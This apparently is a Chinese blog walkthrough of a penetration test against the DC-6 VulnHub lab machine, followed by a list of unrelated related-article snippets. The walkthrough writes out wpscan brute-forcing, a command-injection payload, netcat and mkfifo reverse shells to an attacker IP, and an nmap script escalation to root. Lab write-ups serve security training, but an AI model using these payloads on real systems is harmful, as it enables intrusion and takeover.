Bob Xiao
Bob Xiao

[渗透测试][Kali]对DC-6靶机进行渗透测试

对DC-6靶机进行渗透测试

本例使用的工具主要有:wpscanBurpSuitenc(瑞士军刀)

1. 搭建渗透平台

Kali 2018, DC-6靶机, VMWare虚拟机平台
DC-6靶机的渗透需要用到DC作者在https://www.vulnhub.com/entry/dc-6,315/给出的提示

发现主机这个步骤省略

2. 枚举用户名

站点使用了wordpress,考虑使用wpscan

root@kali:~# wpscan --url wordy -eu

2. 用户名和密码爆破

DC-6的作者给了这样的提示

OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years.

  • 这个文件可以在kali OS对应的目录下找到
  • 我们根据提示生成一本字典,用于密码爆破
root@kali:~# wpscan --url wordy -U users.txt -P dc6pass.txt

----省略n行----

[+] Performing password attack on Xmlrpc against 5 user/s
[SUCCESS] - mark / helpdesk01                                                                                                                        
Trying jens / !lak019b Time: 00:09:39 <======================> (12547 / 12547) 100.00% Time: 00:09:39

[i] Valid Combinations Found:
 | Username: mark, Password: helpdesk01
  • 现在可以登入网站后台

3. 注入

  • 后台页面中有一个工具:activity monitor,这个工具下的tools选项卡下的lookup功能存在远程代码执行漏洞,可以在searchexploit工具中搜索到详细信息。
  • 打开BP,设置好代理,随便往输入框输入一个域名,点击lookup
  • BP拦截到数据包,里面有一块就是刚才输入的域名,我输入的是 g.cn,我在后面加了一段其他命令,然后放行数据包
g.cn | ls -l
  • 前端页面返回了目录信息,不多说,直接试试nc

本地开启端口监听

root@kali:/# nc -lvp 1234

远程代码,放入bp中再转发给目标主机,即可拿到shell

g.cn | nc 192.168.11.128 1234 -e /bin/bash

4. 提权

  • 拿到shell之后在mark用户目录下找到了一组用户名和密码,马上切换用户。
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
  • 尝试一下sudo -l出现了免密的jens的命令
graham@dc-6:~$ sudo -l
sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
  • 考虑再用nc弄一个jens的反弹shell

追加到backup.sh的内容

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.11.128 1234 > /tmp/f
  • 本地打开nc监听后运行backup.sh,可以拿到jens的shell,sudo -l看一下,nmap可以免密root,让这条命令帮我们打开一个shell,就可以拿到root。然后修改root密码,新建用户并设置密码再ssh登陆,最后切换为root账户
echo 'os.execute("/bin/sh")' > getroot.nse
nmap --script getroot.nse

你可能感兴趣的:(渗透)

  • 李开复:苹果发布AI应用的未来 AI大模型应用之禅 计算机软件编程原理与应用实践javapythonjavascriptkotlingolang架构人工智能
    苹果,AI,应用,未来,深度学习,自然语言处理,计算机视觉1.背景介绍近年来,人工智能(AI)技术取得了飞速发展,并开始渗透到人们生活的方方面面。从智能手机的语音助手到自动驾驶汽车,AI正在改变着我们的世界。作为科技巨头,苹果也积极布局AI领域,并将其融入到其产品和服务中。2017年,苹果发布了其首款AI芯片A11Bionic,并将其应用于iPhoneX等产品。该芯片拥有强大的神经网络处理能力,为
  • 云起无垠入选中国信息通信研究院2024年度首期“磐安”优秀案例 人工智能
    近日,中国信通院举办的深度观察报告会系列论坛在北京顺利召开。在数字生态治理分论坛上,2024年度首期“磐安”优秀案例——AI+数字安全应用优秀案例遴选结果正式公布,云起无垠凭借其在生成式AI网络安全攻防对抗垂直领域扎实的研究及应用成果,成功入选该年度首期“磐安”优秀案例。当下,数字化浪潮席卷全球,信息技术广泛渗透各个产业。云计算、大数据、人工智能、物联网等前沿技术深度融合,传统制造业生产线、现代服
  • 虚拟与现实的桥梁:Facebook AI 如何变革社交互动模式 LokiSan Facebookfacebook智能合约人工智能隐私保护
    在过去的十年里,社交平台的发展经历了巨大的变化,而其中最为引人注目的便是人工智能(AI)技术的引入。作为全球最大的社交平台之一,Facebook在人工智能的应用上不断创新,通过AI变革了社交互动的方式,为用户带来了更加智能和个性化的社交体验。人工智能如何融入社交平台人工智能并非突然出现在Facebook的社交模式中,而是通过不断的发展和技术积累,逐步渗透到平台的各个方面。首先,AI被应用于内容推荐
  • 【超详细】深入解析Kali Linux:常见指令大全,助你成为安全专家 wit_@ chrome前端linuxkail网络安全
    深入解析KaliLinux:常见指令大全,助你成为安全专家KaliLinux是网络安全领域最受欢迎的操作系统之一,专为渗透测试、数字取证和网络安全研究而设计。无论你是网络安全新手,还是经验丰富的安全专家,掌握KaliLinux的常见指令都是必不可少的。本文将详细介绍KaliLinux中的一些常见指令,帮助你更好地利用这个强大的工具。1.基本系统指令1.1apt-get包管理KaliLinux基于D
  • Web3 与数据隐私:如何让用户掌控个人信息 Roun3 web3web3去中心化区块链隐私保护
    随着数字化时代的快速发展,互联网已经渗透到我们生活的方方面面,个人数据的收集与使用也变得越来越普遍。与此同时,数据隐私问题逐渐成为全球关注的焦点。传统的互联网平台通常将用户的数据存储在中心化的服务器上,这意味着平台拥有对用户数据的完全控制权。然而,Web3的出现为我们提供了一个新的可能性,让用户能够重新掌控自己的个人信息,恢复数据隐私的主权。1.什么是Web3?Web3,也被称为去中心化的互联网,
  • 开源的未来 10 年:中国开源社区建立是关键 开源社
    开源社KAIYUANSHE以下文章来源于CSDN,作者陈绪[CSDN.成就一亿技术人](#)【CSDN编者按】从EricRaymond在自由软件的范畴下进一步提出OpenSource开源软件至今,已经过去30余年,今天,开源不仅完全渗透互联网,更成为众多IT公司的基石。不过,中国的开源一直却呈现着企业热使用热社区冷开发冷的景象,真正参与开源产品开发和社区贡献的开发者凤毛麟角。同时,在过去的一年多里
  • 学习笔记一:oracle体系结构组件 coxddta29006 数据库操作系统java
    首先声明一下,我的学习笔记参考书主要是官方教材,oracle9idatabaseadministrationfundamentsed2.0我觉得学习是一个循序渐进的过程,从面到点,从宏观到微观,逐步渗透,各个击破,对于oracle,怎么样从宏观上来理解呢?先来看一个图,这个图取自于上面提到的教材,这个图对于从整体上理解ORACLE的体系结构组件,非常关键.下面来解释下这个图.对于一个数据库系统来说
  • 信息化在传统行业的作用 程序员WANG 工具信息化传统行业人工智能大数据
    摘要:本文深入探讨了信息化在传统行业中的重要作用。通过分析信息化技术在制造业、农业、服务业等传统行业的具体应用,阐述了其如何推动传统行业在生产效率、管理模式、市场竞争力等方面的变革与提升。研究表明,信息化已成为传统行业转型升级、实现可持续发展的关键驱动力。关键词:信息化;传统行业;转型升级;生产效率一、引言随着信息技术的飞速发展,信息化已渗透到社会经济的各个领域。传统行业作为国民经济的重要支柱,正
  • AI 对程序员的冲击剖析 程序员WANG 工具人工智能机器学习语言模型
    摘要随着人工智能(AI)技术的飞速发展,其影响力已逐渐渗透到各个行业,程序员群体也面临着前所未有的冲击。本文深入探讨AI对程序员在编程工作模式、技能需求以及职业发展路径等方面带来的冲击,并分析程序员应对这些冲击的策略与方向,旨在为程序员在AI时代的职业发展提供参考。一、引言AI技术近年来取得了突破性进展,其在自然语言处理、机器学习、深度学习等领域的应用日益广泛。在软件开发领域,AI不再仅仅是辅助工
  • AI 在生活中的渗透与技术解析 程序员WANG 工具深度学习机器学习语音识别自然语言处理语言模型
    引言在当今数字化时代,人工智能(AI)已不再是科幻小说中的概念,而是实实在在地渗透到人们生活的方方面面。从清晨醒来使用的智能语音助手,到夜晚入睡时智能家居设备营造的舒适环境,AI技术正悄然改变着我们的生活方式、工作模式以及社会互动。本文旨在深入探讨AI在生活中的具体应用场景,并解析支撑这些应用的关键技术。AI在日常生活中的应用场景智能语音助手智能语音助手如Siri、小爱同学和小度等,已成为许多人日
  • Pocsuite3渗透测试框架编写POC和EXP脚本 wespten 全栈网络安全渗透测试代码审计网络安全工具开发大数据
    在我们的日常渗透测试中,经常挖掘到一些漏洞,但是我们一般使用挖掘工具或者手工判断的时候,不好确定是不是真的存在这么一个漏洞,因此POC脚本就应运而生了。POC全称是ProofofConcept,中文译作概念验证。它是专门为了验证漏洞是否真的存在的脚本。而EXP全称是Exploit,中文译作漏洞利用程序。它是对POC验证结果的一种漏洞利用脚本。因为市面上有关POC和EXP脚本的教程比较稀少,但是比较
  • AI Agent 原理解析及应用场景深度洞察 power-辰南 大模型算法实战工程人工智能aiagent大模型
    在当今科技飞速发展的时代,AIAgent作为人工智能领域的重要分支,正以其独特的智能特性和广泛的应用潜力,逐渐渗透到各个行业和我们生活的方方面面。它为解决复杂问题、提升系统效率和实现智能化交互提供了全新的途径。本文将深入剖析AIAgent的原理,并详细探讨其在多个领域的关键应用场景。一、AIAgent的定义与基本概念AIAgent,即人工智能代理,是一种能够感知其所处环境,并基于所感知的信息自主地
  • 汽车和工业用激光雷达行业分析 LPiling 汽车自动驾驶人工智能
    行业现状激光雷达(LiDAR)作为自动驾驶和智能驾驶领域的关键技术,近年来经历了显著的技术进步和成本下降。激光雷达通过脉冲激光照射目标并用传感器测量反射脉冲返回时间来测量目标距离,能够生成高分辨率的地图和三维模型。这种技术在汽车领域的应用已经从高端车型快速渗透到中低端市场,成为自动驾驶系统不可或缺的传感器之一。在工业领域,激光雷达支持机器人、工厂自动化和物流等多种应用。随着电子商务的蓬勃发展,消费
  • 【2024最新】渗透测试工具大全(超详细),收藏这一篇就够了! 渗透谢老丝 linuxweb安全网络安全密码学系统安全
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包所有工具仅能在取得足够合法授权的企业安全建设中使用,在使用所有工具过程中,您应确保自己所有行为符合当地的法律法规。如您在使用所有工具的过程中存在任何非法行为,您将自行承担所有后果,所有工具所有开发者和所有贡献者不承担任何法律及连带责任。除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用以下所有工具。您的使用行为或
  • 网络安全渗透基础 Hero.Youth #基础学习安全
    一、基础1、基本要素:保密性:不能非授权访问,通过访问控制与数据加密来保障保密性;完整性:只有授权的人才能修改,通过访问控制来阻止数据篡改,通过算法进行信息验证;可用性:是网络总体可靠性的需求,通过访问控制来阻止非授权人员的访问;可控性:使用授权机制,控制信息传播范围、内容、必要时能恢复密钥;不可否认性:是对出现的安全问题提供调查的依据和手段,一般通过数字签名来实现;2、网络脆弱性原因:开放的网络
  • 网络安全渗透测试的八个步骤 披荆斩棘的GG 学习路线Web安全网络安全web安全网络安全
    一、明确目标1.确定范围:测试目标的范畴、ip、网站域名、内外网、检测帐户。2.确定标准:能渗入到何种程度,所花费的时间、能不能改动提交、能不能漏洞利用、这些。3.确定要求:web应用的漏洞、业务逻辑漏洞、工作人员管理权限管理漏洞、这些。二、信息收集1.方法:积极扫描仪,开放搜索等。2.开放搜索:使用百度搜索引擎得到:后台管理、未经授权网页页面、比较敏感url、这些。3.基础信息:IP、子网、网站
  • 面试经验分享 | 北京渗透测试岗位 黑客老陈 面试经验分享职场和发展安全web安全服务器运维
    更多大厂面试经验的视频经验分享看主页目录:所面试的公司:安全大厂所在城市:北京面试职位:渗透测试工程师面试方式:腾讯会议线上面试+线下面试面试过程:面试官的问题:1、说一下XSS有哪几种类型及区别?2、讲一下你所知道的端口号及其代表什么服务?3、在渗透测试中,拿到一个目标公司的站点,接下来你会怎么做,说下具体流程?4、说一下CSRF和SSRF的区别?5、说一下文件上传的绕过方式?6、mysql数据
  • 《AGI:开启智能新纪元的钥匙》 空云风语 人工智能深度学习神经网络agi人工智能深度学习AIGC
    一、AGI:人工智能的进阶之路在科技飞速发展的当下,人工智能(AI)已逐渐渗透到我们生活的各个角落,从智能手机中的语音助手,到自动驾驶汽车,再到医疗领域的疾病诊断辅助,AI的身影无处不在。然而,在AI的宏大版图中,当前被广泛应用的大多属于狭义人工智能(NarrowAI),它专注于特定领域的任务执行,而通用人工智能(ArtificialGeneralIntelligence,简称AGI)则代表着人工
  • DNS缓存—互联网高效运行的幕后功臣 服务器运维缓存系统
    在当今数字化时代,互联网已经渗透到我们生活的方方面面。当我们在浏览器中输入一个网址,瞬间就能访问到对应的网站,这背后DNS缓存功不可没。DNS缓存是一种优化域名解析过程的机制。我们知道,互联网上的计算机通过IP地址来相互识别和通信,但IP地址是一串难记的数字,于是域名应运而生。一、DNS缓存有什么作用?1、提升访问效率在网络访问中,首次访问某个域名时,设备需向DNS服务器发起查询以获取对应的IP地
  • [ vulhub漏洞复现篇 ] Apache Tomcat 文件包含漏洞 (CVE-2020-1938) _PowerShell 渗透测试自学篇[靶场实战]vulhubapachetomcatjava
    博主介绍‍博主介绍:大家好,我是_PowerShell,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录博主介绍一、漏洞简介二、漏洞编号(选填)三、漏洞靶场(选填)1.vulhub靶场环境搭建2.切换到此靶场目录3.启动靶
  • PenSafe(水洞扫描工具) 不一样的信息安全 工具安全web安全网络安全
    免责声明本系列工具仅供安全专业人员进行已授权环境使用,此工具所提供的功能只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用工具中的功能对任何计算机系统进行入侵操作。利用此工具所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。工具地址:点击领取PenSafe(水洞扫描工具)简介渗透测试安全(PenetrationTesting+Safe):在
  • #渗透测试#网络安全# 一文搞懂什么是木马!!! 独行soc 一文了解网络安全安全网络面试木马病毒
    免责声明本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。目录一、什么是木马木马的定义木马的类型二、如何检测电脑是否感染木马?三、木马与病毒的区别是什么?四、常见的木马传播途径有哪些?五、木马病毒混合体案例分析案例1:CIH病毒与木马结合案例2:熊猫
  • 渗透测试之webshell 蚁剑 流量分析 特性分析 抓包分析 浩浩测试一下 网络安全安全系统安全web安全安全架构网络攻击模型
    目录蚁剑是什么特性简介:蚁剑流量特征两大特征流量分析分析UserAgent数据内容解码分析总结蚁剑是什么蚁剑(AntSword)是一款开源的跨平台WebShell管理工具特性简介:AntSword(蚁剑)是一款开源的网络安全工具,常用于网络渗透测试和攻击。它可以远程连接并控制被攻击计算机,执行命令、上传下载文件等操作。蚁剑与网站进行数据交互的过程中发送的数据是经过编码器编码后再发送支持的编码方式有
  • 人生建议往死里学网络安全!零基础也能跨行学习!!漏洞挖掘还能做副业 黑客老哥 web安全学习安全网络黑客
    一、网络安全的重要性:从‘不学会被黑’到‘学会保护别人’网络安全的概念现在不再是技术圈的独立话题,它已经渗透到社会的各个领域。从个人的隐私保护、企业的数据安全,到国家的信息防护,网络安全几乎影响了每一个人的生活。无论是黑客攻击、勒索病毒、数据泄露,还是国家间的信息战,网络安全已经成为现代社会的基础设施之一。所以,首先要明白学习网络安全的重要性:你不仅是在学习技术,更多的是在为自己和他人的安全“筑城
  • 渗透测试术语--必要基础 大象只为你 跟我学网安知识网络安全
    一、前言了解和记住渗透测试术语是网络安全技术人员必要的基础,能帮助我们有效沟通和合作、全面理解渗透测试流程、设计和规划渗透测试活动、安全漏洞识别和利用和规避法律和道德风险。我整理一部分术语,自己归为8个分类方便记忆。共整理了56个术语,每个术语都有简要的含义解释。二、渗透测试术语1、攻击介质1.1、漏洞硬件、软件、协议的缺陷,可以通过未授权的方式访问、破坏系统。1.2、木马获取用户权限的程序或者代
  • 渗透测试工具包 | 开源安全测试工具 | 网络安全工具_网络安全渗透测试工具 程序员安安 安全开源测试工具网络安全信息安全web安全android
    项目介绍记录渗透测试开源工具。自动化渗透测试AttackSurfaceMapper-自动化渗透测试工具,使用手册/测试流程。vajra-自动化渗透测试.Savior-渗透测试报告自动生成工具!.漏洞利用框架hackUtils-它是一个用于渗透测试和网络安全研究的黑客工具包,渗透以及web攻击脚本。msf框架:pocsscan攻击框架Pocsuite攻击框架Beebeeto攻击框架漏洞POC&EXP
  • 内网安全攻防:渗透测试实战指南之内网信息搜集 网络安全进阶 渗透测试网络安全渗透测试web安全信息安全
    《内网安全攻防:渗透测试实战指南》第2章:内网信息搜集内网渗透测试的核心是信息搜集。本章主要介绍了当前主机信息搜集、域内存活主机探测、域内端口扫描、域内用户和管理员权限的获取、如何获取域内网段划分信息和拓扑架构分析等,并介绍了域分析工具BloodHound的使用。搜集本机信息网络配置信息、操作系统及软件的信息、本机服务信息、进程列表、启动程序信息、计划任务、主机开机时间、用户列表、连接会话、端口列
  • 内网渗透测试工具及渗透测试安全审计方法总结 Hacker_Nightrain 测试工具安全网络
    1.内网安全检查/渗透介绍1.1攻击思路有2种思路:攻击外网服务器,获取外网服务器的权限,接着利用入侵成功的外网服务器作为跳板,攻击内网其他服务器,最后获得敏感数据,并将数据传递到攻击者,看情况安装长期后门,实现长期控制和获得敏感数据的方式;攻击办公网的系统、办公网电脑、办公网无线等方式,一般是采用社工,实现控制办公电脑,再用获得的办公网数据,可能是内网的各种登录账号和密码,再获取办公网或者生产网
  • 系统农场商城区块链:农业与商业的技术革新
    在数字化浪潮的推动下,区块链技术正逐渐渗透到各个领域,为传统行业带来全新的变革机遇。系统农场商城区块链便是在这样的背景下应运而生,它将区块链技术深度融入农业生产与商业运营之中,为农业产业链的发展注入了新的活力。技术原理与架构系统农场商城区块链基于分布式账本技术,通过多个节点共同维护一个不可篡改的账本。每个节点都保存着完整的交易记录和数据信息,当有新的交易发生时,需要经过多个节点的验证和共识机制的确
  • 人生建议往死里学网络安全!零基础也能跨行学习!!漏洞挖掘还能做副业 黑客老哥 web安全学习安全网络系统安全
    一、网络安全的重要性:从‘不学会被黑’到‘学会保护别人’网络安全的概念现在不再是技术圈的独立话题,它已经渗透到社会的各个领域。从个人的隐私保护、企业的数据安全,到国家的信息防护,网络安全几乎影响了每一个人的生活。无论是黑客攻击、勒索病毒、数据泄露,还是国家间的信息战,网络安全已经成为现代社会的基础设施之一。所以,首先要明白学习网络安全的重要性:你不仅是在学习技术,更多的是在为自己和他人的安全“筑城
  • jQuery 跨域访问的三种方式 No 'Access-Control-Allow-Origin' header is present on the reque qiaolevip 每天进步一点点学习永无止境跨域众观千象
    XMLHttpRequest cannot load http://v.xxx.com. No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'http://localhost:63342' is therefore not allowed access. test.html:1
  • mysql 分区查询优化 annan211 java分区优化mysql
    分区查询优化 引入分区可以给查询带来一定的优势,但同时也会引入一些bug. 分区最大的优点就是优化器可以根据分区函数来过滤掉一些分区,通过分区过滤可以让查询扫描更少的数据。 所以,对于访问分区表来说,很重要的一点是要在where 条件中带入分区,让优化器过滤掉无需访问的分区。 可以通过查看explain执行计划,是否携带 partitions
  • MYSQL存储过程中使用游标 chicony Mysql存储过程
    DELIMITER $$ DROP PROCEDURE IF EXISTS getUserInfo $$ CREATE PROCEDURE getUserInfo(in date_day datetime)-- -- 实例-- 存储过程名为:getUserInfo-- 参数为:date_day日期格式:2008-03-08--    BEGINdecla
  • mysql 和 sqlite 区别 Array_06 sqlite
    转载: http://www.cnblogs.com/ygm900/p/3460663.html mysql 和 sqlite 区别 SQLITE是单机数据库。功能简约,小型化,追求最大磁盘效率 MYSQL是完善的服务器数据库。功能全面,综合化,追求最大并发效率 MYSQL、Sybase、Oracle等这些都是试用于服务器数据量大功能多需要安装,例如网站访问量比较大的。而sq
  • pinyin4j使用 oloz pinyin4j
    首先需要pinyin4j的jar包支持;jar包已上传至附件内 方法一:把汉字转换为拼音;例如:编程转换后则为biancheng      /** * 将汉字转换为全拼 * @param src 你的需要转换的汉字 * @param isUPPERCASE 是否转换为大写的拼音; true:转换为大写;fal
  • 微博发送私信 随意而生 微博
    在前面文章中说了如和获取登陆时候所需要的cookie,现在只要拿到最后登陆所需要的cookie,然后抓包分析一下微博私信发送界面 http://weibo.com/message/history?uid=****&name=**** 可以发现其发送提交的Post请求和其中的数据, 让后用程序模拟发送POST请求中的数据,带着cookie发送到私信的接入口,就可以实现发私信的功能了。
  • jsp 香水浓 jsp
    JSP初始化     容器载入JSP文件后,它会在为请求提供任何服务前调用jspInit()方法。如果您需要执行自定义的JSP初始化任务,复写jspInit()方法就行了 JSP执行     这一阶段描述了JSP生命周期中一切与请求相关的交互行为,直到被销毁。     当JSP网页完成初始化后
  • 在 Windows 上安装 SVN Subversion 服务端 AdyZhang SVN
    在 Windows 上安装 SVN Subversion 服务端2009-09-16高宏伟哈尔滨市道里区通达街291号   最佳阅读效果请访问原地址:http://blog.donews.com/dukejoe/archive/2009/09/16/1560917.aspx   现在的Subversion已经足够稳定,而且已经进入了它的黄金时段。我们看到大量的项目都在使
  • android开发中如何使用 alertDialog从listView中删除数据? aijuans android
    我现在使用listView展示了很多的配置信息,我现在想在点击其中一条的时候填出 alertDialog,点击确认后就删除该条数据,( ArrayAdapter ,ArrayList,listView 全部删除),我知道在 下面的onItemLongClick 方法中 参数 arg2  是选中的序号,但是我不知道如何继续处理下去 1 2 3
  • jdk-6u26-linux-x64.bin 安装 baalwolf linux
    1.上传安装文件(jdk-6u26-linux-x64.bin) 2.修改权限 [root@localhost ~]# ls -l /usr/local/jdk-6u26-linux-x64.bin 3.执行安装文件 [root@localhost ~]# cd /usr/local [root@localhost local]# ./jdk-6u26-linux-x64.bin&nbs
  • MongoDB经典面试题集锦 BigBird2012 mongodb
    1.什么是NoSQL数据库?NoSQL和RDBMS有什么区别?在哪些情况下使用和不使用NoSQL数据库? NoSQL是非关系型数据库,NoSQL = Not Only SQL。 关系型数据库采用的结构化的数据,NoSQL采用的是键值对的方式存储数据。 在处理非结构化/半结构化的大数据时;在水平方向上进行扩展时;随时应对动态增加的数据项时可以优先考虑使用NoSQL数据库。 在考虑数据库的成熟
  • JavaScript异步编程Promise模式的6个特性 bijian1013 JavaScriptPromise
            Promise是一个非常有价值的构造器,能够帮助你避免使用镶套匿名方法,而使用更具有可读性的方式组装异步代码。这里我们将介绍6个最简单的特性。         在我们开始正式介绍之前,我们想看看Javascript Promise的样子: var p = new Promise(function(r
  • [Zookeeper学习笔记之八]Zookeeper源代码分析之Zookeeper.ZKWatchManager bit1129 zookeeper
    ClientWatchManager接口 //接口的唯一方法materialize用于确定那些Watcher需要被通知 //确定Watcher需要三方面的因素1.事件状态 2.事件类型 3.znode的path public interface ClientWatchManager { /** * Return a set of watchers that should
  • 【Scala十五】Scala核心九:隐式转换之二 bit1129 scala
    隐式转换存在的必要性,   在Java Swing中,按钮点击事件的处理,转换为Scala的的写法如下:   val button = new JButton button.addActionListener( new ActionListener { def actionPerformed(event: ActionEvent) {
  • Android JSON数据的解析与封装小Demo ronin47
    转自:http://www.open-open.com/lib/view/open1420529336406.html package com.example.jsondemo; import org.json.JSONArray; import org.json.JSONException; import org.json.JSONObject;    impor
  • [设计]字体创意设计方法谈 brotherlamp UIui自学ui视频ui教程ui资料
      从古至今,文字在我们的生活中是必不可少的事物,我们不能想象没有文字的世界将会是怎样。在平面设计中,UI设计师在文字上所花的心思和功夫最多,因为文字能直观地表达UI设计师所的意念。在文字上的创造设计,直接反映出平面作品的主题。 如设计一幅戴尔笔记本电脑的广告海报,假设海报上没有出现“戴尔”两个文字,即使放上所有戴尔笔记本电脑的图片都不能让人们得知这些电脑是什么品牌。只要写上“戴尔笔
  • 单调队列-用一个长度为k的窗在整数数列上移动,求窗里面所包含的数的最大值 bylijinnan java算法面试题
    import java.util.LinkedList; /* 单调队列 滑动窗口 单调队列是这样的一个队列:队列里面的元素是有序的,是递增或者递减 题目:给定一个长度为N的整数数列a(i),i=0,1,...,N-1和窗长度k. 要求:f(i) = max{a(i-k+1),a(i-k+2),..., a(i)},i = 0,1,...,N-1 问题的另一种描述就
  • struts2处理一个form多个submit chiangfai struts2
    web应用中,为完成不同工作,一个jsp的form标签可能有多个submit。如下代码: <s:form action="submit" method="post" namespace="/my"> <s:textfield name="msg" label="叙述:">
  • shell查找上个月,陷阱及野路子 chenchao051 shell
    date -d "-1 month" +%F     以上这段代码,假如在2012/10/31执行,结果并不会出现你预计的9月份,而是会出现八月份,原因是10月份有31天,9月份30天,所以-1 month在10月份看来要减去31天,所以直接到了8月31日这天,这不靠谱。     野路子解决:假设当天日期大于15号
  • mysql导出数据中文乱码问题 daizj mysql中文乱码导数据
    解决mysql导入导出数据乱码问题方法: 1、进入mysql,通过如下命令查看数据库编码方式: mysql>  show variables like 'character_set_%'; +--------------------------+----------------------------------------+ | Variable_name&nbs
  • SAE部署Smarty出现:Uncaught exception 'SmartyException' with message 'unable to write dcj3sjt126com PHPsmartysae
      对于SAE出现的问题:Uncaught exception 'SmartyException' with message 'unable to write file...。 官方给出了详细的FAQ:http://sae.sina.com.cn/?m=faqs&catId=11#show_213 解决方案为:   01 $path 
  • 《教父》系列台词 dcj3sjt126com
    Your love is also your weak point. 你的所爱同时也是你的弱点。   If anything in this life is certain, if history has taught us anything, it is that you can kill anyone.   不顾家的人永远不可能成为一个真正的男人。 &
  • mongodb安装与使用 dyy_gusi mongo
    一.MongoDB安装和启动,widndows和linux基本相同 1.下载数据库,     linux:mongodb-linux-x86_64-ubuntu1404-3.0.3.tgz 2.解压文件,并且放置到合适的位置     tar -vxf mongodb-linux-x86_64-ubun
  • Git排除目录 geeksun git
    在Git的版本控制中,可能有些文件是不需要加入控制的,那我们在提交代码时就需要忽略这些文件,下面讲讲应该怎么给Git配置一些忽略规则。   有三种方法可以忽略掉这些文件,这三种方法都能达到目的,只不过适用情景不一样。 1.  针对单一工程排除文件 这种方式会让这个工程的所有修改者在克隆代码的同时,也能克隆到过滤规则,而不用自己再写一份,这就能保证所有修改者应用的都是同一
  • Ubuntu 创建开机自启动脚本的方法 hongtoushizi ubuntu
    转载自: http://rongjih.blog.163.com/blog/static/33574461201111504843245/ Ubuntu 创建开机自启动脚本的步骤如下: 1) 将你的启动脚本复制到 /etc/init.d目录下 以下假设你的脚本文件名为 test。   2) 设置脚本文件的权限 $ sudo chmod 755
  • 第八章 流量复制/AB测试/协程 jinnianshilongnian nginxluacoroutine
    流量复制 在实际开发中经常涉及到项目的升级,而该升级不能简单的上线就完事了,需要验证该升级是否兼容老的上线,因此可能需要并行运行两个项目一段时间进行数据比对和校验,待没问题后再进行上线。这其实就需要进行流量复制,把流量复制到其他服务器上,一种方式是使用如tcpcopy引流;另外我们还可以使用nginx的HttpLuaModule模块中的ngx.location.capture_multi进行并发
  • 电商系统商品表设计 lkl
    DROP TABLE IF EXISTS `category`; -- 类目表 /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `category` ( `id` int(11) NOT NUL
  • 修改phpMyAdmin导入SQL文件的大小限制 pda158 sqlmysql
     用phpMyAdmin导入mysql数据库时,我的10M的 数据库不能导入,提示mysql数据库最大只能导入2M。    phpMyAdmin数据库导入出错:   You probably tried to upload too large file. Please refer to documentation for ways to workaround this limit.
  • Tomcat性能调优方案 Sobfist apachejvmtomcat应用服务器
    一、操作系统调优 对于操作系统优化来说,是尽可能的增大可使用的内存容量、提高CPU的频率,保证文件系统的读写速率等。经过压力测试验证,在并发连接很多的情况下,CPU的处理能力越强,系统运行速度越快。。 【适用场景】 任何项目。 二、Java虚拟机调优 应该选择SUN的JVM,在满足项目需要的前提下,尽量选用版本较高的JVM,一般来说高版本产品在速度和效率上比低版本会有改进。 J
  • SQLServer学习笔记 vipbooks 数据结构xml
    1、create database school 创建数据库school 2、drop database school 删除数据库school 3、use school 连接到school数据库,使其成为当前数据库 4、create table class(classID int primary key identity not null) 创建一个名为class的表,其有一
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他